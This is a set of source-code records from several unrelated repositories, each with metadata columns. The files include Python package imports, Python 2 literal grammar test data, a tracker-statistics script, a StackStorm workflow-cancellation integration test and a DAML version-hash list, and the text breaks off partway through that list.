| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72e7b08740de4230b24cd577cdbba822aad6a844
| 133
|
py
|
Python
|
core/platform/__init__.py
|
cmayer0087/dashzero
|
73f53577556764f93eab4406c271faab06c03aa4
|
[
"MIT"
] | 21
|
2020-02-21T21:35:10.000Z
|
2022-03-01T13:24:19.000Z
|
core/platform/__init__.py
|
shpi/homeassistant-gui
|
d6f9212ddff70a4d229c3a5efc23364cc142a27a
|
[
"MIT"
] | 7
|
2020-06-06T10:03:22.000Z
|
2021-10-30T15:13:54.000Z
|
core/platform/__init__.py
|
shpi/homeassistant-gui
|
d6f9212ddff70a4d229c3a5efc23364cc142a27a
|
[
"MIT"
] | 6
|
2020-02-21T20:57:03.000Z
|
2022-02-15T07:26:29.000Z
|
from core.platform.baseplatform import BasePlatform
from core.platform.raspberry import Raspberry
from core.platform.shpi import Shpi
| 44.333333
| 51
| 0.87218
| 18
| 133
| 6.444444
| 0.388889
| 0.206897
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082707
| 133
| 3
| 52
| 44.333333
| 0.95082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72f1cd692ca1315295fa221fd7ddb8d0050e53ef
| 559
|
py
|
Python
|
Python/Tests/TestData/Grammar/LiteralsV2.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 695
|
2019-05-06T23:49:37.000Z
|
2022-03-30T01:56:00.000Z
|
Python/Tests/TestData/Grammar/LiteralsV2.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/TestData/Grammar/LiteralsV2.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
1000L
u"unicode string"
U"unicode string"
ur"raw unicode"
UR"raw unicode"
Ur"raw unicode"
uR"raw unicode"
u"""unicode string"""
U"""unicode string"""
ur"""raw unicode"""
UR"""raw unicode"""
Ur"""raw unicode"""
uR"""raw unicode"""
u'unicode string'
U'unicode string'
ur'raw unicode'
UR'raw unicode'
Ur'raw unicode'
uR'raw unicode'
u'''unicode string'''
U'''unicode string'''
ur'''raw unicode'''
UR'''raw unicode'''
Ur'''raw unicode'''
uR'''raw unicode'''
u"\
\\\'\"\a\b\f\n\r\t\u2026\v\052\x2A"
u'\N{COLON}'
-2147483648l
-2147483648L
0720
-100L
0o720L
0b0101L
| 15.971429
| 35
| 0.676208
| 93
| 559
| 4.064516
| 0.236559
| 0.21164
| 0.507937
| 0.444444
| 0.806878
| 0.806878
| 0.806878
| 0.806878
| 0.806878
| 0.806878
| 0
| 0.095808
| 0.103757
| 559
| 34
| 36
| 16.441176
| 0.658683
| 0
| 0
| 0.235294
| 0
| 0
| 0.527697
| 0.081633
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f406a59c7854e0f76c523713e34696a11b37d824
| 5,237
|
py
|
Python
|
src/analysis/document_threshold_analysis.py
|
stevenzim/chiir-2019
|
8355b8de42c725130edfb7bace490ad34d351ca4
|
[
"MIT"
] | null | null | null |
src/analysis/document_threshold_analysis.py
|
stevenzim/chiir-2019
|
8355b8de42c725130edfb7bace490ad34d351ca4
|
[
"MIT"
] | null | null | null |
src/analysis/document_threshold_analysis.py
|
stevenzim/chiir-2019
|
8355b8de42c725130edfb7bace490ad34d351ca4
|
[
"MIT"
] | null | null | null |
"""Code below can be used to extract some simple descriptive statistics about the documents the user will retrieve in
results page. e.g. if document is in top quartile of privace threats"""
# Example to get statistics for participant 'TOOO1'
from src import experiment
from src import annotations
task_list = ['T1', 'T2', 'T3', 'T4', 'T5', 'T6', 'T7', 'T8', 'T9', 'T10']
# Get Descriptive statistics for each task
a = experiment.Experiment('T0001')
stats_dict = {}
for task_id in task_list:
a.task_id = task_id
a.get_task_payload()
results = a.get_task_payload()
results = results['all_results']
stats_obj = annotations.Statistics(results, 'TOTAL_TRACKERS')
print(task_id)
stats_dict[task_id] = stats_obj.__dict__
stats_dict
# Get tests of threshold results for each task (e.g. above median, tukey outliers)
from collections import Counter
from src import experiment
from src import annotations
print("_________ON TOTAL TRACKERS__________")
a = experiment.Experiment('T0001')
stats_dict = {}
results = a.get_task_payload()
results = results['all_results']
for task_id in task_list:
a.task_id = task_id
a.get_task_payload()
results = a.get_task_payload()
results = results['all_results']
stats_obj = annotations.Statistics(results, 'TOTAL_TRACKERS')
threshold_data = stats_obj.get_all_statistical_test(results, 'TOTAL_TRACKERS')
threshold_fields = ['above_mean','above_std', 'above_median', 'above_upper_quart', 'tukey_outlier']
for threshold in threshold_fields:
print(threshold)
print(Counter(map(lambda x: x[threshold], threshold_data)))
print("_________ON REMAINING_TRACKERS__________")
a = experiment.Experiment('T0001')
stats_dict = {}
results = a.get_task_payload()
results = results['all_results']
for task_id in task_list:
a.task_id = task_id
a.get_task_payload()
results = a.get_task_payload()
results = results['all_results']
print(len(results))
stats_obj = annotations.Statistics(results, 'REMAINING_TRACKERS')
threshold_data = stats_obj.get_all_statistical_test(results, 'REMAINING_TRACKERS')
threshold_fields = ['above_mean','above_std', 'above_median', 'above_upper_quart', 'tukey_outlier']
for threshold in threshold_fields:
print(threshold)
print(Counter(map(lambda x: x[threshold], threshold_data)))
# OUTPUT.... NOT A BIG DIFFERENCE
# _________ON TOTAL TRACKERS__________
# T2
# T2
# T2
# above_mean
# Counter({False: 12, True: 9})
# above_std
# Counter({False: 16, True: 5})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON REMAINING_TRACKERS__________
# T2
# T2
# T2
# above_mean
# Counter({False: 12, True: 9})
# above_std
# Counter({False: 16, True: 5})
# above_median
# Counter({False: 12, True: 9})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON TOTAL TRACKERS__________
# T5
# T5
# above_mean
# Counter({False: 12, True: 9})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON REMAINING_TRACKERS__________
# T5
# T5
# above_mean
# Counter({False: 14, True: 7})
# above_std
# Counter({False: 18, True: 3})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 20, True: 1})
# _________ON TOTAL TRACKERS__________
# T6
# T6
# above_mean
# Counter({False: 11, True: 10})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON REMAINING_TRACKERS__________
# T6
# T6
# above_mean
# Counter({False: 14, True: 7})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 20, True: 1})
# _________ON TOTAL TRACKERS__________
# T8
# T8
# above_mean
# Counter({False: 11, True: 10})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 20, True: 1})
# _________ON REMAINING_TRACKERS__________
# T8
# T8
# above_mean
# Counter({False: 14, True: 7})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 12, True: 9})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON TOTAL TRACKERS__________
# T9
# T9
# above_mean
# Counter({False: 13, True: 9})
# above_std
# Counter({False: 19, True: 3})
# above_median
# Counter({True: 11, False: 11})
# above_upper_quart
# Counter({False: 16, True: 6})
# tukey_outlier
# Counter({False: 20, True: 2})
# _________ON REMAINING_TRACKERS__________
# T9
# T9
# above_mean
# Counter({False: 13, True: 9})
# above_std
# Counter({False: 18, True: 4})
# above_median
# Counter({True: 11, False: 11})
# above_upper_quart
# Counter({False: 16, True: 6})
# tukey_outlier
# Counter({False: 22})
| 25.057416
| 118
| 0.708421
| 728
| 5,237
| 4.57967
| 0.15522
| 0.172765
| 0.053989
| 0.064787
| 0.84793
| 0.845831
| 0.817037
| 0.807439
| 0.779244
| 0.779244
| 0
| 0.045055
| 0.152377
| 5,237
| 208
| 119
| 25.177885
| 0.706015
| 0.565591
| 0
| 0.78
| 0
| 0
| 0.172058
| 0.013127
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.16
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be4df30d0912545535fbfd66402ba40d8133e32f
| 12,947
|
py
|
Python
|
st2tests/integration/mistral/test_wiring_cancel.py
|
nickbaum/st2
|
21c01c7c8c0f511ee75e3b2a3a03502472281058
|
[
"Apache-2.0"
] | 1
|
2020-11-09T21:05:33.000Z
|
2020-11-09T21:05:33.000Z
|
st2tests/integration/mistral/test_wiring_cancel.py
|
ellerbrock/st2
|
b3a0d9f82053c1fd5adb616dc8331bad427cd11f
|
[
"Apache-2.0"
] | 3
|
2021-03-26T00:29:52.000Z
|
2021-03-26T00:34:45.000Z
|
st2tests/integration/mistral/test_wiring_cancel.py
|
ellerbrock/st2
|
b3a0d9f82053c1fd5adb616dc8331bad427cd11f
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import shutil
import tempfile
from integration.mistral import base
from st2common.constants import action as action_constants
class CancellationWiringTest(base.TestWorkflowExecution):
temp_dir_path = None
def setUp(self):
super(CancellationWiringTest, self).setUp()
# Create temporary directory used by the tests
_, self.temp_dir_path = tempfile.mkstemp()
os.chmod(self.temp_dir_path, 0o755) # nosec
def tearDown(self):
if self.temp_dir_path and os.path.exists(self.temp_dir_path):
if os.path.isdir(self.temp_dir_path):
shutil.rmtree(self.temp_dir_path)
else:
os.remove(self.temp_dir_path)
def test_cancellation(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
ex = self._execute_workflow('examples.mistral-test-cancel', params)
self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
# Cancel the workflow before the temp file is created. The workflow will be paused
# but task1 will still be running to allow for graceful exit.
self.st2client.executions.delete(ex)
# Expecting the ex to be canceling, waiting for task1 to be completed.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the ex to be canceled.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Task is completed successfully for graceful exit.
self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_SUCCEEDED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_task_cancellation(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
ex = self._execute_workflow('examples.mistral-test-cancel', params)
task_exs = self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
# Cancel the task execution.
self.st2client.executions.delete(task_exs[0])
# Wait for the task and parent workflow to be canceled.
self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_to_subworkflow_action(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
action_ref = 'examples.mistral-test-cancel-subworkflow-action'
ex = self._execute_workflow(action_ref, params)
task_exs = self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
subwf_ex = task_exs[0]
# Cancel the workflow before the temp file is created. The workflow will be canceled
# but task1 will still be running to allow for graceful exit.
self.st2client.executions.delete(ex)
# Expecting the ex to be canceling, waiting for task1 to be completed.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELING)
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the exs to be canceled.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_to_subchain(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
action_ref = 'examples.mistral-test-cancel-subworkflow-chain'
ex = self._execute_workflow(action_ref, params)
task_exs = self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
subwf_ex = task_exs[0]
# Cancel the workflow before the temp file is created. The workflow will be canceled
# but task1 will still be running to allow for graceful exit.
self.st2client.executions.delete(ex)
# Expecting the ex to be canceling, waiting for task1 to be completed.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELING)
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the exs to be canceled.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_from_subworkflow_action(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
action_ref = 'examples.mistral-test-cancel-subworkflow-action'
ex = self._execute_workflow(action_ref, params)
task_exs = self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
subwf_ex = task_exs[0]
# Cancel the subworkflow action.
self.st2client.executions.delete(subwf_ex)
# Expecting task1 and main workflow ex to be canceling.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELING)
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the exs to be canceled.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_from_subchain(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
action_ref = 'examples.mistral-test-cancel-subworkflow-chain'
ex = self._execute_workflow(action_ref, params)
task_exs = self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
subwf_ex = task_exs[0]
# Cancel the subworkflow action.
self.st2client.executions.delete(subwf_ex)
# Expecting task1 and main workflow ex to be canceling.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELING)
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_RUNNING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the exs to be canceled.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_chain_cascade_to_subworkflow(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
action_ref = 'examples.chain-test-cancel-with-subworkflow'
ex = self._execute_workflow(action_ref, params)
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_RUNNING)
# Cancel the workflow before the temp file is created. The workflow will be canceled
# but task1 will still be running to allow for graceful exit.
self.st2client.executions.delete(ex)
# Expecting the ex to be cancelinging, waiting for task1 to be completed.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELING)
# Get the subworkflow ex. Since this is from an Action Chain, the task
# context is not available like task of Mistral workflows. Therefore, query
# for the children executions of the chain to get the task execution.
task_exs = self._get_children(ex)
self.assertEqual(len(task_exs), 1)
subwf_ex = self._wait_for_state(task_exs[0], action_constants.LIVEACTION_STATUS_CANCELING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the exs to be canceled.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_chain_cascade_from_subworkflow(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
action_ref = 'examples.chain-test-cancel-with-subworkflow'
ex = self._execute_workflow(action_ref, params)
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_RUNNING)
# Identify and cancel the task ex.
# Get the subworkflow ex. Since this is from an Action Chain, the task
# context is not available like task of Mistral workflows. Therefore, query
# for the children executions of the chain to get the task execution.
task_exs = self._get_children(ex)
self.assertEqual(len(task_exs), 1)
subwf_ex = self._wait_for_state(task_exs[0], action_constants.LIVEACTION_STATUS_RUNNING)
self.st2client.executions.delete(subwf_ex)
# Expecting task1 and main workflow ex to be canceling.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELING)
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_RUNNING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the exs to be canceled.
subwf_ex = self._wait_for_state(subwf_ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
| 46.405018
| 98
| 0.709585
| 1,757
| 12,947
| 5.010814
| 0.103586
| 0.04373
| 0.048728
| 0.137324
| 0.849159
| 0.848364
| 0.848364
| 0.848364
| 0.848364
| 0.848364
| 0
| 0.004441
| 0.217348
| 12,947
| 278
| 99
| 46.571942
| 0.864403
| 0.341006
| 0
| 0.759399
| 0
| 0
| 0.063432
| 0.038817
| 0
| 0
| 0
| 0
| 0.12782
| 1
| 0.075188
| false
| 0
| 0.045113
| 0
| 0.135338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be5186a8699ba3aa6f1e58fd9af1f8f088f3d1c2
| 350
|
py
|
Python
|
data_loader/__init__.py
|
ghhabib2/mPower_Project
|
3404bc84d0f756bb9fee0891c255307b23214d7c
|
[
"MIT"
] | null | null | null |
data_loader/__init__.py
|
ghhabib2/mPower_Project
|
3404bc84d0f756bb9fee0891c255307b23214d7c
|
[
"MIT"
] | null | null | null |
data_loader/__init__.py
|
ghhabib2/mPower_Project
|
3404bc84d0f756bb9fee0891c255307b23214d7c
|
[
"MIT"
] | null | null | null |
from data_loader.data_loader import DataLoader
from data_loader.load_tapping_data import TappingDataLoader
from data_loader.load_memory_data import MemeoryDataLoader
from data_loader.load_walking_data import WalkingDataLoader
from data_loader.load_voice_data import VoiceDataLoader
from data_loader.load_accumulated_data import AccumulatedDataLoader
| 50
| 67
| 0.914286
| 47
| 350
| 6.446809
| 0.340426
| 0.231023
| 0.277228
| 0.29703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068571
| 350
| 6
| 68
| 58.333333
| 0.929448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be71b526a10d997ea52538027ee9ce51fcf32166
| 243
|
py
|
Python
|
graph_weather/models/__init__.py
|
openclimatefix/graph_weather
|
e00b75418d62181d213fede2925bb100b4091f57
|
[
"MIT"
] | 6
|
2022-02-25T09:27:57.000Z
|
2022-03-28T22:26:56.000Z
|
graph_weather/models/__init__.py
|
openclimatefix/graph_weather
|
e00b75418d62181d213fede2925bb100b4091f57
|
[
"MIT"
] | 11
|
2022-02-25T08:24:17.000Z
|
2022-03-30T18:31:16.000Z
|
graph_weather/models/__init__.py
|
openclimatefix/graph_weather
|
e00b75418d62181d213fede2925bb100b4091f57
|
[
"MIT"
] | null | null | null |
"""Models"""
from .layers.assimilator_decoder import AssimilatorDecoder
from .layers.assimilator_encoder import AssimilatorEncoder
from .layers.decoder import Decoder
from .layers.encoder import Encoder
from .layers.processor import Processor
| 34.714286
| 58
| 0.847737
| 28
| 243
| 7.285714
| 0.357143
| 0.245098
| 0.205882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08642
| 243
| 6
| 59
| 40.5
| 0.918919
| 0.024691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be91aae3692083c837250ea5fcb2595913e45b71
| 74
|
py
|
Python
|
python/testData/addImport/newFromImportFromSameModule.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/addImport/newFromImportFromSameModule.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/addImport/newFromImportFromSameModule.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from mod import a
from mod import b
from mod import c, a
from mod import d
| 18.5
| 20
| 0.77027
| 17
| 74
| 3.352941
| 0.411765
| 0.491228
| 0.912281
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 74
| 4
| 21
| 18.5
| 0.982759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
beaffa07ee6169e99b3c7d3fd3ea2374d0ffa83d
| 7,392
|
bzl
|
Python
|
compatibility/versions.bzl
|
sofusmortensen/daml
|
33fe0ca3d90affdb79e16f8b43cb751d9b7cdb9a
|
[
"Apache-2.0"
] | null | null | null |
compatibility/versions.bzl
|
sofusmortensen/daml
|
33fe0ca3d90affdb79e16f8b43cb751d9b7cdb9a
|
[
"Apache-2.0"
] | null | null | null |
compatibility/versions.bzl
|
sofusmortensen/daml
|
33fe0ca3d90affdb79e16f8b43cb751d9b7cdb9a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# This file is autogenerated and should not be modified manually.
# Update versions/UpdateVersions.hs instead.
sdk_versions = [
"1.0.0",
"1.0.1",
"1.1.1",
"1.2.0",
"1.3.0",
"1.4.0",
"1.5.0",
"1.6.0-snapshot.20200908.5166.0.1623baec",
"1.6.0-snapshot.20200915.5208.0.09014dc6",
"0.0.0",
]
platform_versions = [
"1.0.0",
"1.0.1",
"1.1.1",
"1.2.0",
"1.3.0",
"1.4.0",
"1.5.0",
"1.6.0-snapshot.20200908.5166.0.1623baec",
"1.6.0-snapshot.20200915.5208.0.09014dc6",
"0.0.0",
]
stable_versions = [
"1.0.0",
"1.0.1",
"1.1.1",
"1.2.0",
"1.3.0",
"1.4.0",
"1.5.0",
"0.0.0",
]
latest_stable_version = "1.5.0"
version_sha256s = {
"1.0.0": {
"linux": "ee7e2f50394d44fb3490068de64d37f4f87534e802717bd7e07e8767df2e4e05",
"macos": "feb2086a9a01048300270c71eb212c8541cdec1082f541408250d6124bc307a8",
"windows": "2028efe1f505c1994e1abc41c0fb5181669cd46834818aa8276d04b0fb6eb034",
"test_tool": "cf66efafd9490e1256e825f377b208b8ae90151f56e411b596fbaaef91353e14",
"daml_types": "f85e5dd7ef1c5733826c1c79e316d2733344ac0da67f0d381ba70fc83a64fc78",
"daml_ledger": "5aab9a6cbdc987fc4279481152ff65bda503425f7e338c5123237b283aae44d6",
"daml_react": "30ab9db8a20df6cbfed7c1b42a45ca0ea55af6e150c013105d46c94afa5f9a46",
},
"1.0.1": {
"linux": "9cff04c29bb28503b41dcde310a2f3307984b1d976f8bccfb38268672e730c8f",
"macos": "a7e094e2d8766c852a247e0601b7c062c435b0d91f9ab256bbf4fcb40971ee36",
"windows": "41ecd44f3ea7c2a64a7f677f36b3f26dabaa5de913bc57bd680ea8f40f00ff0b",
"test_tool": "038de725b74f128fc0cb6f3ce8eef7d62da9527d0cbf25b93b7c1623bbb413c9",
"daml_types": "c50d5f37dbb42f45ae1f4f4013a72006ae7bbd531c68c363b54212a3458c5b6e",
"daml_ledger": "12fc3ef723171162128fb5951dec5452f75b1a3de7facf85a2b0126f46de159b",
"daml_react": "dc4cbf95f22cc0300af1f450be316bd55ebbc2816e9806231b13edce85bea44c",
},
"1.1.1": {
"linux": "1e396287b7462147d182fd2c536a5ee03163e3efeefc989d368b1dfc01a40a97",
"macos": "f49dd3f5198d3392b81bd64067f697bc0d18612fe9599a50580d57d1dd9c721c",
"windows": "c2ec9b51f7d4e44309d73f1ee9eb4919eac5c80452782b97d76251a0c283f596",
"test_tool": "f5b5024d7173e7f56b1d2ca57c8ee0b4a107208cd9d15f27f9ab1737ecfc33a4",
"daml_types": "142e7094081a95f202e0a5eaf72a15df724c2b9aa5e83bd22e4c544705de967e",
"daml_ledger": "15041d0be63f1781b9d036481093f49d56071078a4e826a862de921b5a806d93",
